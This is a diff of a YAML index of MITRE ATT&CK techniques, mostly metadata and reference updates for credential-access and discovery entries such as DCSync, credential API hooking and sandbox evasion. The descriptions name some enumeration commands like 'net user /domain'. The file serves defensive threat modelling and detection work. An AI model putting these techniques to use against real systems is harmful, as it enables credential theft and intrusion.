-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -47743,26 +48405,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -47775,6 +48499,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -47811,17 +48536,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -47867,81 +48592,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -47954,28 +48608,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48032,9 +48752,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48065,7 +48784,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48089,8 +48808,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48155,12 +48872,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48219,7 +48935,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48240,7 +48955,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48261,13 +48976,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48290,15 +49003,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48324,13 +49036,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48355,12 +49066,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -48402,13 +49112,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48469,12 +49178,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48538,19 +49246,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -48597,7 +49304,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -48664,12 +49370,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -48759,18 +49464,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -48813,12 +49517,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -48859,12 +49562,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -48949,7 +49651,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49011,12 +49712,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
